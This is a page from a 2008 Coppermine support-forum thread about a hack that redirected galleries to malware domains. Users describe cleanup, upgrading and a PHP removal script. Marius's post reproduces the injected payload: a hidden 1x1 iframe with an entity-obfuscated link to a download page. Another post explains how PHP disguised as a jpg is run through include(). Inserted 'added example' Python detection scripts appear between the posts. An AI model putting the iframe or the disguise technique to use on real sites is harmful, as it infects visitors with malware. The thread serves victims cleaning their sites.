Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 12
 


Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

Started by htgguy, April 06, 2008, 10:04:11 PM


Joachim Müller

The guy who owns the domain may or may not be the creator of the hack. The whois record shows who owns the domain, nothing more, nothing less. You can't prove anything with that - if you sue him, the guy will claim that the hacker has redirected your site to his domain and that he (the owner of cdpuvbhfzz.com) was not aware of that. Try to prove him wrong - you can't. The only thing you could actually do is try to figure out how this guy makes a living. Once you have figured that out, try to alert his business partners of his reputation. If they don't care, you're probably stuck, so the only thing you could probably do are illegal things (DDOS attacks against his server and such stuff), which would bring you to the same level as the moron who performed the attack. This is something I wouldn't even consider. Sometimes it makes me angry what some people do on the internet, and I would love to visit them and beat them up. But then, this is of course a childish fantasy that would not help at all (and one that would get me into serious trouble), so it's not an option either.
So what are we going to do against the jerk who triggered the attacks? I'll tell you: nothing. There is nothing we can do. I'm not willing to even think about possible actions against that jerk - he's a low-life moron, an insect, a parasite. I pity him - what a poor method to make a living.

Quote from: MyWebsiteAdviser on April 18, 2008, 10:09:18 PM
My website has been hacked too. The hacker somehow uploaded a "45563131x.jpg" file (this is a PHP file, not an image!) to the "~/coppermine/albums/userpics/10001" folder.
See my instructions:
Quote from: Joachim Müller on April 15, 2008, 04:48:46 PM
Zip archives or jpeg files are not harmful by themselves on the server, as they cannot be executed on the server (at least if the server is configured properly). This being said, it doesn't hurt if a malevolent user manages to upload a file named "I_am_evil.jpg" to your webserver that actually isn't a jpeg image, but just a plain text PHP file that contains malicious code that he renamed from I_am_evil.php to I_am_evil.jpg on his client before uploading it. Without the corresponding configuration, such a file cannot do harm. However, it's a trick hackers frequently use to disguise their payload files from the eye of the legitimate site owner: if they manage to break your site's security by modifying an existing PHP file, they can inject code into that PHP file that uses PHP's include command to actually execute the code within I_am_evil.jpg.
Let me give you an example: there is a legitimate PHP file http://your_site.tld/coppermine/upload.php - if an attacker manages to manipulate that file and add a code line like this: include('albums/userpics/100023/picture.jpg'); and then manages to upload the malicious file http://your_site.tld/coppermine/albums/userpics/100023/picture.jpg to your server that actually isn't a jpeg file, but a script file in disguise, the payload contained in that file will be executed. If you manage to sanitize the file http://your_site.tld/coppermine/upload.php (e.g. remove the offending include line), the malicious jpeg file can no longer do harm, so it won't hurt if it is still a leftover from the attack. The same trick can be used by attackers to disguise their payload in all other files that might look innocent (like zip files or similar).
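The disguised-upload and include trick described above can be checked for mechanically. The following is an added Python example, not Coppermine code and not from anyone in this thread; it builds a constructed sample tree using the albums/userpics/100023/picture.jpg and upload.php names from the post, flags "image" files whose bytes are not an image (or that carry a PHP open tag), and flags PHP files that include a non-PHP asset:

```python
import os
import re
import tempfile

# A genuine image starts with one of these signatures; anything else under userpics deserves a look.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG", b"GIF8")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
# include/require of a non-PHP "asset" is the trick described in the post.
INCLUDE_RE = re.compile(
    r"\b(include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+\.(?:jpe?g|png|gif|zip|txt))['\"]",
    re.IGNORECASE)

def is_disguised_image(path):
    """True if a file with an image extension lacks image magic bytes or carries a PHP open tag."""
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if not head.startswith(IMAGE_MAGIC):
        return True
    return b"<?php" in head or b"<?=" in head

def scan_gallery(root):
    """Walk a gallery tree; return (disguised image paths, (php file, included asset) pairs)."""
    disguised, includes = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower().endswith(IMAGE_EXT) and is_disguised_image(path):
                disguised.append(rel)
            elif name.lower().endswith(".php"):
                with open(path, "r", errors="replace") as fh:
                    for m in INCLUDE_RE.finditer(fh.read()):
                        includes.append((rel, m.group(2)))
    return sorted(disguised), sorted(includes)

def build_demo_tree():
    """Constructed sample tree mirroring the post's example; not a real site."""
    root = tempfile.mkdtemp()
    pics = os.path.join(root, "albums", "userpics", "100023")
    os.makedirs(pics)
    with open(os.path.join(pics, "real.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 64)          # real JPEG header
    with open(os.path.join(pics, "picture.jpg"), "wb") as fh:
        fh.write(b"<?php /* constructed stand-in for a script in disguise */ ?>")
    with open(os.path.join(root, "upload.php"), "w") as fh:
        fh.write("<?php\n// legitimate code\ninclude('albums/userpics/100023/picture.jpg');\n")
    return root
```

Run scan_gallery() against the gallery root; every hit in the second list names the PHP file to sanitize, and every hit in the first list names a leftover to delete.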

Marius

Hi all
As many more sites lately, mine was hacked as well. It was more or less the same MO, but it seems that I was "lucky" compared to others (no db changes, no hidden php in zips or jpgs); only 3 files were changed from what I have found, displayimage.php, index.php and thumbnails.php, though I've found a script in the plugins folder; I attached it so the devs can find more useful info on this matter. Hope this helps...

Regards

Marius

Upss.. forgot to mention: this time the domain was different, caatadgouk.com, but still the same Ukrtelegroup Ltd that was mentioned somewhere in this thread...
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#97;&#97;&#116;&#97;&#100;&#103;&#111;&#117;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#52;&#51;&#54;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>
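The src in that iframe is written as HTML numeric entities so that a grep for the domain finds nothing. The following is an added Python example (not from this post or from Coppermine) that decodes such attributes and flags frames sized 1x1 or smaller, which is how the injected redirect hides; the sample HTML is constructed around the iframe quoted above plus a benign embed for contrast:

```python
import html
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Attribute values may be double-quoted, single-quoted or bare (width=1 in the sample).
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def parse_attrs(attr_text):
    """Return {name: value}; html.unescape turns &#104;&#116;... back into readable text."""
    return {m.group(1).lower(): html.unescape(m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(attr_text)}

def _tiny(value):
    """True for a width/height of one pixel or less; missing or non-numeric values are not tiny."""
    try:
        return float(value.rstrip("px")) <= 1
    except (ValueError, AttributeError):
        return False

def find_iframes(text):
    """Return (decoded src, hostname, hidden) for every iframe; hidden means 1x1 or smaller."""
    out = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        hidden = _tiny(attrs.get("width")) and _tiny(attrs.get("height"))
        out.append((src, urlparse(src).hostname or "", hidden))
    return out

def hidden_iframe_hosts(text):
    """The redirect domains a cleaned file should no longer reference, as a sorted list."""
    return sorted({host for _src, host, hidden in find_iframes(text) if hidden and host})

# Constructed sample: the obfuscated iframe quoted in the post, plus a benign embed for contrast.
SAMPLE = (
    "<p>gallery footer</p>\n"
    '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#97;&#97;&#116;&#97;&#100;&#103;'
    '&#111;&#117;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#52;&#51;'
    '&#54;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>\n'
    '<iframe src="https://example.org/player" width="640" height="360"></iframe>\n'
)
```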

MrWells

Shame I missed the script! Would have saved me some work I suspect.

Coppermine and a SMF forum were hit.

I downloaded the forum to my PC and cleaned it with a rough & ready VB program, as no upgrade was available.

I upgraded Coppermine to .16, removed zip files etc., and am about to go to .18; however....

All of my intermediate pictures appear to have vanished! Replaced with a "Click to view full size image" button :o
The thumbnail and full size image still exist. I assume it was caused by the hack? Is there a fix for this please?

MrWells


MyWebsiteAdviser

Joachim Müller, thanks a lot for your explanation.

Alex Webs,
MyWebsiteAdviser.com

Nibbler

Check the size of intermediate images in config. The hack sometimes sets it to 1px.

MrWells

Size still set to 600px

Can I find the pics to see if they exist?
If not, can I force them to be created? If they do exist, how can I reference them?

Nibbler

Rebuild them in admin tools. If that doesn't work then start a new thread.

empfl

Quote from: foulu on April 15, 2008, 07:27:27 AM

...I attach the file with this post, download and rename it to cure.php, upload to your site & run it.

last update: changed some functions to make the cure script run successfully in more cases.


I want to use this script, but sorry, it doesn't work.


I get the following message:

"Parse error: syntax error, unexpected $end in /homepages/xx/yyyyyyyyy/htdocs/cure.php on line 93"


severeidaho

I read through most of these replies. I first found I had a problem because my config for the main page changed dramatically, and I also saw a zip file in one of my albums. I deleted this ZIP file, which could have been a PHP file. My first thought was that someone brute-forced my gallery and got my password. I changed my password only to find that the next day my main page was out of whack again. In the "show how many albums, rows, etc." settings everything was changed to "1". Also, after reading these replies I found that my "path to custom header include" was directing to "albums/userpics/10001/45563131x.jpg", which is incorrect as I don't use a custom header that way.

My gallery is OFFLINE and in Debug mode.  I will be upgrading from 1416 to the latest asap. 

-gerrit

Nibbler

Setting it offline won't stop anything, neither will debug mode.

severeidaho

Hi Nibbler, thanks for letting me know. I did disable the URI, but because this thread is so huge I am sure I missed a lot of fixes. Any chance for a sticky on precautions to take with this problem?

BTW: Anyone else have problems outside of CPG and forum and blog setups? I noticed that my main page also has a script which is detected by Windows Live OneCare as "html exploit".

I have contacted my Host for help but am also looking for Solutions. 

Thanks...

-gerrit

Nibbler

There are no precautions. You can use the new copy of bridge/coppermine.inc.php mentioned in the announcement post to patch your gallery though (will probably work on any 1.4.x). The hack that's in the wild will spread to all php/html files you made writeable in your webspace/webserver.

severeidaho

Can anyone answer whether or not the "Yikes my site has been hacked" thread was posted prior to 1418? The reason I ask is that I am under the impression that upgrading to this latest release fixes the exploit, yet all other php files on the webhost still need to be fixed? The exploit alone is only driven through CPG, correct? Thus eliminating older versions by upgrading to the latest version will end the problem, yet infected php pages outside of CPG still need to be cleaned?

Thanks. 



Joachim Müller

The "Yikes, I've been hacked! Now what?" thread was written on 2008-04-15. As it contains a reference to cpg1.4.18, it must have been written after the release of cpg1.4.18, don't you agree? The announcement thread for cpg1.4.18 was written on 2008-04-14.
Anyway, the "Yikes" thread is generic: it explains what you need to do to sanitize your gallery no matter what - it does not only apply to the cdpuvbhfzz.com hack, but to others as well that may come after it and that might exploit the same vulnerability that existed in all cpg1.4.x versions before cpg1.4.18. That's why it doesn't contain a reference to the attack pattern of the cdpuvbhfzz.com hack (the iframes trick) - the pattern (payload) may differ in future exploits of the pre-cpg1.4.18 vulnerability.
Don't believe what non-experts on this thread said or suggested: after all, they are no experts and their suggestions are just speculation. Believe us (the coppermine dev team members, particularly Nibbler, who spotted and fixed the vulnerability).
To make this absolutely clear: there is absolutely nothing that you can do that makes it acceptable to delay the upgrade to cpg1.4.18 and the sanitization discussed in "Yikes". Your gallery will be vulnerable if you don't upgrade, no matter whether you allow URI uploads, no matter if you're the only user on your gallery or not, no matter whether your gallery is public or private, no matter whether you enabled debug_mode, no matter whether you set your gallery to offline mode. The exploit will not play by the rules and respect permissions. It's up to you all (infected or not) to fix your gallery now! I have little sympathy for people who are aware that the hack is in the wild and that their gallery is outdated, yet they fail to upgrade. Repeat: perform the upgrade. Do so now; "now" as in "today", this very moment, immediately.

Joachim

keithjr

OK, I have had this hit my server (not keeping up with updates ftl)... and wrote a script that goes through and corrects all of your files.

step 1) make a text file with the exact text of the code you want removed (those few lines of php code at the bottom of every php page) - call it say badcode.txt. save it on the root of your web server.

step 2) make a php file, say named fixit.php

I threw this in as the code:

<?php
// The exact text to strip, saved as badcode.txt in the web root (step 1).
$badcode = file_get_contents("badcode.txt");

function parse_dir($dir)
{
  global $badcode;

  if ($handle = opendir($dir))
  {
    while (false !== ($file = readdir($handle)))
    {
      // Always test the full path: a bare $file is resolved relative to the
      // current working directory, not to $dir.
      $path = $dir."/".$file;
      if (!is_dir($path))
      {
        $fn = explode(".", $file);
        if ($fn[sizeof($fn)-1] == "php")
        {
          // good, parse it.
          print("Attempting fix on $path ........");
          $badfile = file_get_contents($path);
          // strpos() returns false when the text is absent and 0 when it sits at the
          // very start of the file, so compare with === rather than == 0.
          if (strpos($badfile, $badcode) === false)
          {
            print("Fix not required.<br>\n");
          }
          else
          {
            $goodfile = str_replace($badcode, "", $badfile);
            // file_put_contents() returns the byte count (0 for an emptied file) or false on failure.
            if (file_put_contents($path, $goodfile) !== false)
              print("OK<br>\n");
            else
              print("Nope.<br>\n");
          }
        }
      }
      elseif ($file != "." && $file != "..")
        parse_dir($path);
    }
    closedir($handle);
  }
}

parse_dir(".");
?>


Run it, and it will tell you what was infected and was able to fix (or not fix), and what was clean.

Hope it helps some other people as it did me.

severeidaho

I did not get a chance to use your code (poster above me) as I just spent quite a while going through my gallery directory and the rest of my website. After upgrading to 1418 I believe I have eliminated all those iframes. Turns out the only files that were messed with were the ones I left chmod 777. I also noticed with FileZilla that the "user" of the files that were messed with was named "nobody", which has been explained to me as a web/Apache footprint. Anyway, I just wanted to post what all I did to fix my website.

First and foremost, I went through the "Yikes, my website was hacked" thread and followed the advice of going through my albums and making sure there were no "php, html and any other executable files". I found that in the "userpics" folder there were folders named "10011" etc.; each came with an "index.html" or "index.php", and in each of these pages the iframe code was there. I removed the code and moved on. In the logs folder under the gallery root, out of 4 pages, 3 had the code; I removed that. I also found that in the gallery root the files named "banner & bannermgr.php" also had the code, since they were chmodded 777. Note that as I am cleaning these files I'm changing the chmod to 755.

My CPMFETCH installation was messed with as well, from chmod 777. This is why my main page (non-CPG related) also had the code attached for the redirect. In the cpmfetch folder the file named "cpmfetch_config.php" was messed with. The best way I can describe it is that the code appeared to be legitimately calling for an image like the usual cpmfetch code calls for images. There was a <php> call, and then the code linked to the userpics album in the gallery and then named images that I never added, followed by the iframe code. This code, if it makes sense to you (the reader), made it possible for any page that used CPMFETCH to allow for the redirect, which in turn gave you a trojan unless you had a good anti-virus.

My wordpress installation was safe since the software itself checks for wrong chmods, etc.  I still upgraded to the latest build to prevent this from happening again. 

By the way, if you find that you can't delete a file with FTP due to 553 permission denied, just contact your host and they will fix it. You can also run a CGI script to fix the user to yourself, as the user "nobody" which created the files doesn't allow you as an admin to chmod or delete or even edit, for that matter.

I truly hope I didn't leave anything out, and hope this info helps you to clean your online website and files.

-gerrit
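The three properties gerrit found on the altered files (world-writable, owned by the web server's account rather than the FTP user, and recently modified) make a useful triage list before reading any file by hand. The following is an added Python example, not from this post or from Coppermine; it assumes the FTP account is the uid running the script and uses a 14-day window, both adjustable, and build_demo_tree() constructs a small sample tree:

```python
import os
import stat
import tempfile
import time

WEB_CODE_EXT = (".php", ".html", ".htm", ".inc")

def audit_tree(root, owner_uid=None, touched_within_days=14, now=None):
    """Return sorted (relpath, reasons) for code files that are world-writable, not owned by
    the site account, or modified within the window; reasons is a tuple of strings."""
    owner_uid = os.getuid() if owner_uid is None else owner_uid
    now = time.time() if now is None else now
    cutoff = now - touched_within_days * 86400
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_CODE_EXT):
                continue
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            reasons = []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_uid != owner_uid:
                reasons.append("owned by uid %d" % st.st_uid)   # e.g. the web server's "nobody"
            if st.st_mtime >= cutoff:
                reasons.append("modified recently")
            if reasons:
                findings.append((os.path.relpath(path, root), tuple(reasons)))
    return sorted(findings)

def build_demo_tree():
    """Constructed sample: one 777 PHP file, one 644 PHP file, one non-code file, all with old mtimes."""
    root = tempfile.mkdtemp()
    old = time.time() - 400 * 86400
    for name, mode in (("bannermgr.php", 0o777), ("index.php", 0o644), ("notes.txt", 0o777)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("<?php // constructed ?>\n")
        os.chmod(path, mode)
        os.utime(path, (old, old))
    return root
```

Files reported with more than one reason are the ones to open first; a 755 file that is nevertheless owned by the server account and freshly modified points at a write path other than FTP.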


Ralf Night

It touched me too; what do I have to do? Is there any answer, or does management just tell you: upgrade your gallery, change your password, etc.?

Joachim Müller

There is an entire thread that you're replying to that you don't read, but reply anyway? There is a sanitization thread that has been mentioned countless times already. Do as suggested in that thread. You have a notorious record of not respecting board rules; do us all a favor and just respect them now, will you?